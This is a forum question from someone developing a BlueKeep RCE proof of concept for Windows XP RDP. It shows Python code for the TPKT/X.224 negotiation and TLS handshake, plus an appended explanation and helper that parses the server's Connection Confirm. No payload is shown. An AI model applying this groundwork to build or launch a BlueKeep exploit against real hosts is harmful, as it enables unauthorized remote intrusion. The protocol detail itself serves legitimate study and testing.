alessandroschino

BlueKeep PoC

Hi guys,

I'm trying to develop a working PoC for causing an RCE (Remote Code Execution) by exploiting the BlueKeep vulnerability in Windows XP.

The vulnerability is in the RDP service.

In the source code I'm trying to establish an initial SSL connection to the host. Here is a part of the source code:

import socket

from OpenSSL import SSL
# The field-description strings used below ('B=3', '>H=len(TPDU)+4', ':=""' ...)
# are impacket's Structure DSL, so the base class comes from impacket.
from impacket.structure import Structure

#skipped part of not relevant source code
"..."
"..."
"..."
"..."

class TPKT(Structure):
    commonHdr = (
        ('Version', 'B=3'),
        ('Reserved', 'B=0'),
        ('Length', '>H=len(TPDU)+4'),
        ('_TPDU', '_-TPDU', 'self["Length"]-4'),
        ('TPDU', ':=""'),
    )


class TPDU(Structure):
    commonHdr = (
        ('LengthIndicator', 'B=len(VariablePart)+1'),
        ('Code', 'B=0'),
        ('VariablePart', ':=""'),
    )

    def __init__(self, data=None):
        Structure.__init__(self, data)
        self['VariablePart'] = ''


class CR_TPDU(Structure):
    commonHdr = (
        ('DST-REF', '<H=0'),
        ('SRC-REF', '<H=0'),
        ('CLASS-OPTION', 'B=0'),
        ('Type', 'B=0'),
        ('Flags', 'B=0'),
        ('Length', '<H=8'),
    )


class DATA_TPDU(Structure):
    commonHdr = (
        ('EOT', 'B=0x80'),
        ('UserData', ':=""'),
    )

    def __init__(self, data=None):
        Structure.__init__(self, data)
        self['UserData'] = ''


class RDP_NEG_REQ(CR_TPDU):
    structure = (
        ('requestedProtocols', '<L'),
    )

    def __init__(self, data=None):
        CR_TPDU.__init__(self, data)
        if data is None:
            self['Type'] = 1

#skipped part of not relevant source code
"..."
"..."
"..."
"..."

def send_initialization_pdu_packet(host):
    """
    initialize the RDP request: send the X.224 Connection Request
    (wrapped in TPKT) carrying an RDP_NEG_REQ, then start TLS on the
    same socket
    """

    tpkt = TPKT()
    tpdu = TPDU()
    rdp_neg = RDP_NEG_REQ()
    rdp_neg['Type'] = 1                 # TYPE_RDP_NEG_REQ
    rdp_neg['requestedProtocols'] = 1   # PROTOCOL_SSL: ask the server for TLS
    tpdu['VariablePart'] = rdp_neg.getData()
    tpdu['Code'] = 0xe0                 # X.224 Connection Request TPDU
    tpkt['TPDU'] = tpdu.getData()
    # start the session
    session = socket.socket()
    session.connect((host, 3389))
    session.sendall(tpkt.getData())
    # the reply is the X.224 Connection Confirm
    results = session.recv(8192)

    print("[@] received: {}".format(repr(results)))
    # turn the session into a SSL connection
    ctx = SSL.Context(SSL.TLSv1_METHOD)
    tls = SSL.Connection(ctx, session)
    tls.set_connect_state()
    # handshake
    tls.do_handshake()
    print("Handshake done")
    return tls

Now the error occurs when tls.do_handshake() is called. The error says "104", "ECONNRESET". I think this means that the connection was reset by peer. If I try this with a Windows 7 machine it works, but with a Windows XP machine it gives me that error. I've tried to use a different SSL Context but the problem still persists. I don't know if, maybe, the configuration of the TPKT isn't correct for Windows XP and so the connection is closed.

Does anyone know what kind of problem it could be?

PS: for more info please PM me ;)
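The code above hands the socket to OpenSSL without looking at the X.224 Connection Confirm it just received. Per MS-RDPBCGR (2.2.1.2), that reply tells the client whether TLS is even on the table: an RDP_NEG_RSP names the selectedProtocol, an RDP_NEG_FAILURE says why negotiation failed, and a server that implements only Standard RDP Security answers with a bare Connection Confirm carrying no rdpNegData at all, in which case a TLS ClientHello is not something it expects on that socket. The helper below is an added example, not the original poster's code and not impacket's: it builds the Connection Request with the standard library only and parses the Confirm into a decision about whether to start a TLS handshake. The three sample replies are constructed for illustration, not captured from real hosts.

```python
"""
X.224 Connection Request / Connection Confirm helpers for the RDP
negotiation phase (MS-RDPBCGR 2.2.1.1 and 2.2.1.2), standard library only.
Added example; not the original poster's code and not impacket's.
"""
import struct

# rdpNegData type codes
TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03

# requestedProtocols / selectedProtocol flags
PROTOCOL_RDP = 0x00000000       # Standard RDP Security (RC4), no TLS layer
PROTOCOL_SSL = 0x00000001       # TLS
PROTOCOL_HYBRID = 0x00000002    # CredSSP (NLA) on top of TLS
PROTOCOL_RDSTLS = 0x00000004
PROTOCOL_HYBRID_EX = 0x00000008
TLS_PROTOCOLS = PROTOCOL_SSL | PROTOCOL_HYBRID | PROTOCOL_RDSTLS | PROTOCOL_HYBRID_EX

FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER",
    2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER",
    6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_x224_cr(requested_protocols=PROTOCOL_SSL, cookie=b""):
    """Return TPKT + X.224 Connection Request + RDP_NEG_REQ as bytes.

    `cookie` is the optional routingToken/cookie field (for example
    b"Cookie: mstshash=user\\r\\n"); it sits between the fixed X.224
    header and rdpNegData.
    """
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0x00, 8, requested_protocols)
    x224_fixed = struct.pack(">HHB", 0, 0, 0)          # DST-REF, SRC-REF, class option
    tpdu_body = x224_fixed + cookie + neg_req
    li = 1 + len(tpdu_body)                            # LengthIndicator: bytes after itself
    tpdu = struct.pack("BB", li, 0xE0) + tpdu_body     # 0xE0 = CR TPDU, CDT 0
    tpkt = struct.pack(">BBH", 3, 0, 4 + len(tpdu))    # version 3, reserved, total length
    return tpkt + tpdu


def parse_x224_cc(data):
    """Parse TPKT + X.224 Connection Confirm.

    Returns a dict with kind in {'rsp', 'failure', 'legacy'} ('legacy' means
    no rdpNegData was present, i.e. the server only speaks Standard RDP
    Security), the selected_protocol or failure_code where present, and
    use_tls telling the caller whether a TLS handshake is appropriate.
    Raises ValueError for anything that is not a well-formed CC.
    """
    if len(data) < 11:
        raise ValueError("short read: %d bytes" % len(data))
    version, _reserved, tpkt_len = struct.unpack(">BBH", data[:4])
    if version != 3 or tpkt_len != len(data):
        raise ValueError("bad TPKT header")
    li, code = data[4], data[5]
    if code & 0xF0 != 0xD0:
        raise ValueError("not an X.224 Connection Confirm (code 0x%02x)" % code)
    if li + 5 != len(data):
        raise ValueError("LengthIndicator %d inconsistent with TPKT length" % li)
    _dst_ref, src_ref = struct.unpack(">HH", data[6:10])
    result = {"kind": "legacy", "src_ref": src_ref, "selected_protocol": None,
              "failure_code": None, "use_tls": False}
    if li == 6:
        return result                                   # bare CC, no rdpNegData
    if li < 14:
        raise ValueError("truncated rdpNegData")
    neg_type, _flags, neg_len, value = struct.unpack("<BBHI", data[11:19])
    if neg_len != 8:
        raise ValueError("rdpNegData length %d != 8" % neg_len)
    if neg_type == TYPE_RDP_NEG_RSP:
        result.update(kind="rsp", selected_protocol=value,
                      use_tls=bool(value & TLS_PROTOCOLS))
    elif neg_type == TYPE_RDP_NEG_FAILURE:
        result.update(kind="failure", failure_code=FAILURE_CODES.get(value, value))
    else:
        raise ValueError("unexpected rdpNegData type 0x%02x" % neg_type)
    return result


# Constructed sample replies (not captures): a server selecting PROTOCOL_SSL,
# a server refusing TLS, and a legacy server returning a bare Connection Confirm.
SAMPLE_CC_TLS = bytes.fromhex("03 00 00 13 0e d0 00 00 12 34 00 02 00 08 00 01 00 00 00")
SAMPLE_CC_FAILURE = bytes.fromhex("03 00 00 13 0e d0 00 00 12 34 00 03 00 08 00 02 00 00 00")
SAMPLE_CC_LEGACY = bytes.fromhex("03 00 00 0b 06 d0 00 00 12 34 00")

if __name__ == "__main__":
    print("CR:", build_x224_cr(PROTOCOL_SSL).hex())
    for name, sample in (("tls", SAMPLE_CC_TLS), ("failure", SAMPLE_CC_FAILURE),
                         ("legacy", SAMPLE_CC_LEGACY)):
        print(name, parse_x224_cc(sample))
```

In the poster's flow the natural place for this is right after `session.recv(8192)`: run `parse_x224_cc(results)` and only create the `SSL.Connection` when `use_tls` is true; a `legacy` or `failure` result means the server never agreed to TLS, so a reset during `do_handshake()` is the expected outcome rather than a TPKT framing problem.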
